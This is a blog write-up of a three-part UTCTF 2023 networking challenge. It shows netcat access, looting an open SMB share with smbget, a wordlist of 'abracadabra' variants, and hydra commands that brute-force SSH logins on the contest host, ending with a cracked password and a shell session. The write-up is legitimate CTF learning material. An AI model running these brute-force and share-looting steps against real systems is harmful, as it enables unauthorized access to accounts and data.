<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Part 1:Problem DescriptionThere are some interesting ports open on betta.utctf.live, particularly port 8080. By Robert Hill (@Rob H on discord) betta.utctf.live:8080 SolutionFor part 1, we simply netc">
<meta property="og:type" content="article">
<meta property="og:title" content="UTCTF 2023 - A Network Problem">
<meta property="og:url" content="https://b3at1.github.io/2023/03/12/UTCTF-2023-A-Network-Problem/index.html">
<meta property="og:site_name" content="b3at">
<meta property="og:description" content="Part 1:Problem DescriptionThere are some interesting ports open on betta.utctf.live, particularly port 8080. By Robert Hill (@Rob H on discord) betta.utctf.live:8080 SolutionFor part 1, we simply netc">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://b3at1.github.io/media/UTCTF-2023/cat.png">
<meta property="article:published_time" content="2023-03-12T14:22:32.000Z">
<meta property="article:modified_time" content="2023-04-07T18:33:03.404Z">
<meta property="article:author" content="Sam Bederman">
<meta property="article:tag" content="writeup">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="networking">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://b3at1.github.io/media/UTCTF-2023/cat.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>UTCTF 2023 - A Network Problem</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Articles</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/b3at1">GitHub</a></li><!--
     --><!--
       --><li><a href="http://b3at1.github.io/resume">Resume</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    
    <br/>
  <!-- TOC DISABLED
<div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Part-1"><span class="toc-number">1.</span> <span class="toc-text">Part 1:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Problem-Description"><span class="toc-number">1.1.</span> <span class="toc-text">Problem Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution"><span class="toc-number">1.2.</span> <span class="toc-text">Solution</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Part-2"><span class="toc-number">2.</span> <span class="toc-text">Part 2:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Problem-Description-1"><span class="toc-number">2.1.</span> <span class="toc-text">Problem Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-1"><span class="toc-number">2.2.</span> <span class="toc-text">Solution</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Part-3"><span class="toc-number">3.</span> <span class="toc-text">Part 3:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Problem-Description-2"><span class="toc-number">3.1.</span> <span class="toc-text">Problem Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-2"><span class="toc-number">3.2.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Conclusion"><span class="toc-number">3.3.</span> <span class="toc-text">Conclusion</span></a></li></ol></li></ol>
    </div>

  -->
    
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        UTCTF 2023 - A Network Problem
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Sam Bederman</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-03-12T14:22:32.000Z" itemprop="datePublished">2023-03-12</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/ctf/" rel="tag">ctf</a>, <a class="tag-link-link" href="/tags/networking/" rel="tag">networking</a>, <a class="tag-link-link" href="/tags/writeup/" rel="tag">writeup</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="Part-1"><a href="#Part-1" class="headerlink" title="Part 1:"></a>Part 1:</h1><h2 id="Problem-Description"><a href="#Problem-Description" class="headerlink" title="Problem Description"></a>Problem Description</h2><p>There are some interesting ports open on betta.utctf.live, particularly port 8080. By Robert Hill (@Rob H on discord)</p>
<p><code>betta.utctf.live:8080</code></p>
<h2 id="Solution"><a href="#Solution" class="headerlink" title="Solution"></a>Solution</h2><p>For part 1, we simply netcat in and receive the flag:<br><code>nc betta.utctf.live 8080</code></p>
<p>Response:<br><code>Hi Wade! I am using socat to broadcat this message. Pretty nifty right? --jwalker utflag&#123;meh-netcats-cooler&#125;  </code></p>
<h1 id="Part-2"><a href="#Part-2" class="headerlink" title="Part 2:"></a>Part 2:</h1><h2 id="Problem-Description-1"><a href="#Problem-Description-1" class="headerlink" title="Problem Description"></a>Problem Description</h2><p>Update: smb port has been moved to 8445 from 445 on networking-misc-p2<br>betta.utctf.live has other interesting ports. Lets look at 8445 this time. By Robert Hill (@Rob H on discord)<br><code>betta.utctf.live:8445</code></p>
<h2 id="Solution-1"><a href="#Solution-1" class="headerlink" title="Solution"></a>Solution</h2><p>When I did this problem originally, it wasn’t specified that we had smb. However, after trying to netcat and into 445 and receiving no response, I looked it up and found “Port 445 is a traditional Microsoft networking port with tie-ins to the original NetBIOS service found in earlier versions of Windows OSes. Today, port 445 is used by <strong>Microsoft Directory Services for Active Directory (AD) and for the Server Message Block (SMB) protocol over TCP&#x2F;IP</strong>.”</p>
<p>So, we know we have smb running, and we need to access it and get a flag out somehow.<br>First, I try to connect using ‘Wade’ as my username, and hoping I could get in without a password somehow.<br><code>smbclient //betta.utctf.live/WorkShares -U Wade</code><br>The SMB server seemed to be configured without username or password at all, and I was able to get into \shares\ just find. Unfortunately, I couldn’t do much since I couldn’t get ‘cat’ or ‘file’ to work, and I’m not familiar with the limited SMB server commands.</p>
<p>Luckily, since the SMB server is fully open to anyone, I just used<br> <code>mkdir ~/utctf2023</code><br> Followed by<br> <code>smbget -a -R smb://betta.utctf.live/WorkShares/ ~/utctf2023</code><br> where the -R downloads folders recursively, and -a to force download even if the file exists.</p>
<p>Now that I had all the files on my local machine, I went browsing and eventually found this photo of someone’s cat at<br><code>~/utctf2023/shares/OfficeFun/JaysCats/Meowfoy.jpg</code><br><img src="/media/UTCTF-2023/cat.png" alt="Cat"  width="300" height=auto><br>I also found <code>~/utctf2023/shares/IT/Itstuff/notetoIT</code><br>which reads:</p>
<blockquote>
<p>“I don’t understand the fasination with the magic phrase “abracadabra”, but too many people are using them as passwords. Crystal Ball, Wade Coldwater, Jay Walker, and Holly Wood all basically have the same password. Can you please reach out to them and get them to change thier passwords or at least get them append a special character?”<br>– Arty F.<br>utflag{out-of-c0ntrol-access}</p>
</blockquote>
<blockquote>
</blockquote>
<p>Ok, so that was a bit of work, but we finally have our second flag. On to part 3!</p>
<h1 id="Part-3"><a href="#Part-3" class="headerlink" title="Part 3:"></a>Part 3:</h1><h2 id="Problem-Description-2"><a href="#Problem-Description-2" class="headerlink" title="Problem Description"></a>Problem Description</h2><p>We’ve gathered a lot of information at this point, let get access through ssh. (ignore port 22, use 8822)<br>(Use of brute force is permitted for this problem, but please set the wait time in hydra so you don’t overwhelm the server)<br>By Rob H (@Rob H on discord)<br><code>betta.utctf.live:8822</code></p>
<h2 id="Solution-2"><a href="#Solution-2" class="headerlink" title="Solution"></a>Solution</h2><p>So immediatly, <code>Use of brute force is permitted</code> tells me it’ll probably be something involving hydra. (Again, the problem description gives it away now, but it didn’t when I solved it originally)</p>
<p>Now before we jump on hydra and blast the server with rockyou.txt, lets use some common sense and review what we know so far:</p>
<ul>
<li>In problem one, we have a user named ‘jwalker’</li>
<li>In problem two we learn about users named: Crystal Ball, Wade Coldwater, Jay Walker, and Holly Wood. These users could possibly be using ‘abracadabra’ followed by a special character as their password</li>
<li>Arty F. might also be a notable figure, not sure</li>
<li>Random lore: Wade’s twitter account from previous years, the cat image, the company logo, etc. It’s not relevant here.</li>
</ul>
<p>Ok, so if one of the passwords is actually just a variation of ‘abracadabra’ it should be a super easy thing to crack. Lets create a wordlist really fast:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line">abracadabra!</span><br><span class="line">abracadabra&quot;</span><br><span class="line">abracadabra#</span><br><span class="line">abracadabra$</span><br><span class="line">abracadabra%</span><br><span class="line">abracadabra&amp;</span><br><span class="line">abracadabra&#x27;</span><br><span class="line">abracadabra(</span><br><span class="line">abracadabra)</span><br><span class="line">abracadabra*</span><br><span class="line">abracadabra+</span><br><span class="line">abracadabra,</span><br><span class="line">abracadabra-</span><br><span class="line">abracadabra.</span><br><span class="line">abracadabra/</span><br><span class="line">abracadabra0</span><br><span class="line">abracadabra1</span><br><span class="line">abracadabra2</span><br><span class="line">abracadabra3</span><br><span class="line">abracadabra4</span><br><span class="line">abracadabra5</span><br><span class="line">abracadabra6</span><br><span class="line">abracadabra7</span><br><span class="line">abracadabra8</span><br><span class="line">abracadabra9</span><br><span class="line">abracadabra:</span><br><span class="line">abracadabra;</span><br><span class="line">abracadabra&lt;</span><br><span class="line">abracadabra=</span><br><span class="line">abracadabra&gt;</span><br><span class="line">abracadabra?</span><br><span class="line">abracadabra@</span><br><span class="line">abracadabraA</span><br><span class="line">abracadabraB</span><br><span class="line">abracadabraC</span><br><span class="line">abracadabraD</span><br><span class="line">abracadabraE</span><br><span class="line">abracadabraF</span><br><span class="line">abracadabraG</span><br><span class="line">abracadabraH</span><br><span class="line">abracadabraI</span><br><span class="line">abracadabraJ</span><br><span class="line">abracadabraK</span><br><span class="line">abracadabraL</span><br><span class="line">abracadabraM</span><br><span class="line">abracadabraN</span><br><span class="line">abracadabraO</span><br><span class="line">abracadabraP</span><br><span class="line">abracadabraQ</span><br><span class="line">abracadabraR</span><br><span class="line">abracadabraS</span><br><span class="line">abracadabraT</span><br><span class="line">abracadabraU</span><br><span class="line">abracadabraV</span><br><span class="line">abracadabraW</span><br><span class="line">abracadabraX</span><br><span class="line">abracadabraY</span><br><span class="line">abracadabraZ</span><br><span class="line">abracadabra[</span><br><span class="line">abracadabra\</span><br><span class="line">abracadabra]</span><br><span class="line">abracadabra^</span><br><span class="line">abracadabra_</span><br><span class="line">abracadabra`</span><br><span class="line">abracadabraa</span><br><span class="line">abracadabrab</span><br><span class="line">abracadabrac</span><br><span class="line">abracadabrad</span><br><span class="line">abracadabrae</span><br><span class="line">abracadabraf</span><br><span class="line">abracadabrag</span><br><span class="line">abracadabrah</span><br><span class="line">abracadabrai</span><br><span class="line">abracadabraj</span><br><span class="line">abracadabrak</span><br><span class="line">abracadabral</span><br><span class="line">abracadabram</span><br><span class="line">abracadabran</span><br><span class="line">abracadabrao</span><br><span class="line">abracadabrap</span><br><span class="line">abracadabraq</span><br><span class="line">abracadabrar</span><br><span class="line">abracadabras</span><br><span class="line">abracadabrat</span><br><span class="line">abracadabrau</span><br><span class="line">abracadabrav</span><br><span class="line">abracadabraw</span><br><span class="line">abracadabrax</span><br><span class="line">abracadabray</span><br><span class="line">abracadabraz</span><br><span class="line">abracadabra&#123;</span><br><span class="line">abracadabra|</span><br><span class="line">abracadabra&#125;</span><br><span class="line">abracadabra~</span><br></pre></td></tr></table></figure>
<p>Sorry for forcing you to scroll to the bottom of that. Anyways, hopefully one of these are the correct password for one of the accounts. All we need to do know is get hydra working at it!</p>
<p>I started by running:<br><code>hydra -t 4 -W 0.1 -s 8822 -l &#39;Wade&#39; -P /usr/share/wordlists/abracadabra.txt betta.utctf.live ssh</code></p>
<p><em>You can skip this if you already understand Hydra:</em><br>-t 4 limits threads to 4<br>-W 0.1 makes sure to wait 0.1 seconds between attempts<br>-s 8822 means to use port 8822<br>-l ‘Wade’ specifies login name as ‘Wade’<br>-P &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;abracadabra.txt specifies the wordlist to use</p>
<p>Unfortunately, after running with usernames like Wade, Wade Coldwater, wadecoldwater, HollyWood, etc. I couldn’t get anything. </p>
<p>Remember how I said lets use common sense to review what we had earlier? Well, I didn’t use enough obviously, as I hadn’t paid attention to username formats. Since in the first problem, there was a user named ‘jwalker’ what if we use the name ‘wcoldwater’?</p>
<p>Lets try it: <code>hydra -t 4 -W 0.1 -s 8822 -l wcoldwater -P /usr/share/wordlists/abracadabra.txt betta.utctf.live ssh</code> </p>
<p><code>[8822][ssh] host: betta.utctf.live   login: wcoldwater   password: abracadabra$</code></p>
<p>Nice! now we can just ssh in: <code>ssh wcoldwater@betta.utctf.live -p 8822</code> and use <code>abracadabra$</code> as our password:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">utctf&#123;cust0m3d-lsts-rule!&#125; well done!</span><br><span class="line">327f93bdc02d:~$ ls</span><br><span class="line">note.txt</span><br><span class="line">327f93bdc02d:~$ cat note.txt</span><br><span class="line">Note to self: Get better at this security stuff.</span><br><span class="line">327f93bdc02d:~$ </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>We have a flag, and a little easter egg!</p>
<h2 id="Conclusion"><a href="#Conclusion" class="headerlink" title="Conclusion"></a>Conclusion</h2><p>I really enjoyed this awesome challenge series from UTCTF 2023! Big thanks to Robert Hill for writing these challenges, and to ISSS for hosting an amazing CTF. This was my second year doing it and I always look forward to UTCTF.<br><br></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a target="_blank" rel="noopener" href="http://github.com/b3at1">GitHub</a></li>
         
          <li><a href="http://b3at1.github.io/resume">Resume</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Part-1"><span class="toc-number">1.</span> <span class="toc-text">Part 1:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Problem-Description"><span class="toc-number">1.1.</span> <span class="toc-text">Problem Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution"><span class="toc-number">1.2.</span> <span class="toc-text">Solution</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Part-2"><span class="toc-number">2.</span> <span class="toc-text">Part 2:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Problem-Description-1"><span class="toc-number">2.1.</span> <span class="toc-text">Problem Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-1"><span class="toc-number">2.2.</span> <span class="toc-text">Solution</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Part-3"><span class="toc-number">3.</span> <span class="toc-text">Part 3:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Problem-Description-2"><span class="toc-number">3.1.</span> <span class="toc-text">Problem Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-2"><span class="toc-number">3.2.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Conclusion"><span class="toc-number">3.3.</span> <span class="toc-text">Conclusion</span></a></li></ol></li></ol>
    </div>


  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2022-2023
    Sam Bederman
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Articles</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/b3at1">GitHub</a></li><!--
     --><!--
       --><li><a href="http://b3at1.github.io/resume">Resume</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
